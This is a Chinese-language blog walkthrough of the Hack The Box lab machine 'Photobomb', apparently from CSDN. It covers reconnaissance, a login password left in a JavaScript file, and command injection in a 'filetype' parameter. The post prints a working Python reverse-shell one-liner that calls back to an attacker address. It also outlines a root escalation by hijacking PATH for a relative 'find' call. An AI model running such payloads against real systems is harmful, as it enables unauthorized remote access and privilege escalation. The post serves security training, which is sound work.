《网络安全0-100》Hack The Box [HTB] : Photobomb

最新推荐文章于 2024-08-29 14:58:56 发布
最新推荐文章于 2024-08-29 14:58:56 发布
阅读量166 收藏 4
点赞数 7
分类专栏: 网络安全 文章标签: 网络安全 web安全 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77069887/article/details/131971516
版权

一、信息收集

用nmap、dirsearch进行信息收集,发现开放22,80端口,一个矢量图标和printer目录。最开始我注意的是nginx,在网上搜索该版本漏洞后发现能使用的只有一个路径穿越漏洞/file../,且并未泄露有效信息。我们接着从80入手,将域名添加到本地hosts后进行访问。

96b89c9b887e451d8c1e0a32802c4d53.png

 二、本地JS文件中发现密码

访问printer目录,是一个登录框,尝试admin123等弱密码无果后放弃。

aa2646eddc34475fa1c6a987dbd4fdc9.png

 发现JS文件,进行访问

80732304d944478a8f95c31f6adfef7b.png

 在JS文件中发现之前扫描的printer目录,并附带有登录密码

59544943e79e4782b15de8ea4c55707f.png

 使用密码成功登录

99151297bfc5494fb34ba9077cadaa96.png

 三、命令注入,远程代码执行

使用burp抓包,发现注入点为filetype

9d06f30eecb64066a5b78ca9f8d4be16.png

 新建监听,使用python3#1playload直接反弹shell

playload:export RHOST="10.10.14.4";export RPORT=5555;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

74ec3c9be4374dcdb109d1fb7506bcb1.png

 查看当前可执行文件cleanup.sh,该文件类型为bash脚本,从文件最后一行中得出,find使用的相对路径,并非绝对路径,那我们在find文件中写入恶意代码,改变当前环境即可获取权限。

08b229bfc8ef49e5876ca5bdb589266b.png

 

安全仔的日记
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
HackTheBox Photobomb 命令注入与远程代码执行和环境变量提权
Ba1_Ma0的博客
11-07 2210
最关键的地方就是最后一行的这个命令,他find使用的是相对路径,而不是绝对路径,也就是说,我们改变一下环境变量,然后在当前目录创建一个find文件,里面写一个shell,之后用sudo执行的时候,就能直接获得root权限。然后就是常规的枚举网站子域名,网站目录,查找网站框架的漏洞什么的,这些我都做了,但是没什么突破点,只能去网页上看看了。登录后可以下载一些图片,然后就没其他的了,我们使用burp抓一下下载的包。这个文件是刚刚登录框的js文件,这里应该是账号和密码,然后返回登录。成功获得root权限。
HackTheBox-Machines--TwoMillion
七天
12-20 1102
TwoMillion 测试过程。
Hack The Box -- Blazorized
qq_22792465的博客
07-06 1378
http://blazorized.htb/_framework/blazor.webassembly.js 中存在一些json文件,min.js中是编码文件并没有找到其他路径。没见过的直接给度娘+gpt,既然是基于Blazor框架那就搜一搜Blazor的信息。
SolarLab - hackthebox
tanbinn的博客
06-15 1096
hackthebox的solarlab靶场
Hack The Box-Runner
m0_52742680的博客
04-22 1579
HackTheBox S5赛季靶场第一篇
hackthebox htb interface:CVE-2022-28368
qq_29060627的博客
05-20 895
hackthebox-interface信息搜集nmap扫描端口发现开放的22和80PORT STATE SERVICE REASON22/tcp open ssh syn-ac...-x 是走BurpSuite的http8080代理,不需要走代理可以删除.注意^< 和 ^>做了转义。
Hack The Box-Resource
m0_52742680的博客
08-06 1976
HackTheBox S6赛季靶场第一篇
HackTheBox系列-Devvortex
qq_43264813的博客
12-15 1138
1、使用nmap进行端口扫描2、将扫描出来的devvortex.htb域名写入到hosts文件中3、使用浏览器访问网站进行信息收集,并且源码中没有发现什么有用的价值4、使用gobuster对子域名爆破发现一个子域名5、添加hosts文件后使用浏览器访问6、对两个网站页面使用dirsearch进行目录枚举,对结果进行分析查看7、访问/administrator目录发现是一个Joomla的登录服务,并且在README.txt文件中知道版本为4.2。
Crafty - hackthebox
tanbinn的博客
05-21 744
hackthebox的Crafty靶场
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The BoxHTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
vagrant-htbHackTheBox的Vagrantfile
03-01
网络工具 python3 解压缩 多路复用器 纳帕 网页壳 码头工人 如果要添加更多,只需编辑Provision / kali.yml文件。 Fancy Git repo的添加 拍子 尼尚 再一次,g,如果您想添加更多,只需将git repo块附加在...
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HackTheBox机器:分析,LDAP盲注入以获取凭据.zip
01-24
网络安全领域,HackTheBoxHTB)是一个在线平台,它提供了一系列的虚拟机(VMs),让安全专业人员和爱好者可以练习并提高他们的渗透测试技能。在这个特定的案例中,我们关注的是一个名为“分析”的HTB机器,其中...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8429
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】服务基础第一阶段——第二节:Windows系统管理基础----虚拟化IP地址以及用户与组管理
goldfish8848的博客
08-25 1270
不同的用户身份拥有不同的权限,每个用户包含一个名称和一个密码,用户账户拥有唯一的安全标识Windows系统中,每个用户账户都有一个独特的安全标识符(SID,Security Identifier)它在系统内部用于控制对各种资源的访问权限。我们可以通过不同的方法查看用户的SID:1.使用命令提示符(CMD)这里的CMD就是我们常用的命令提示符(类似于终端的那个窗口),输入命令来查看当前登陆用户的SID如果需要查看特定用户的SID,可以使用命令。
网络安全(黑客)——自学2024
2401_84466325的博客
08-25 1050
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全】漏洞挖掘
最新发布
anquan2233的博客
08-29 833
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
人工智能在网络安全领域的应用探索
A526847的博客
08-29 523
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
hackthebox
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助用户了解真实世界中的网络漏洞和攻击技术,并提供一个安全的环境来进行学习和实践。 请注意,使用 Hack The Box 平台进行未经授权的攻击是违法的。这个平台仅用于合法的学习和研究目的。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全仔的日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值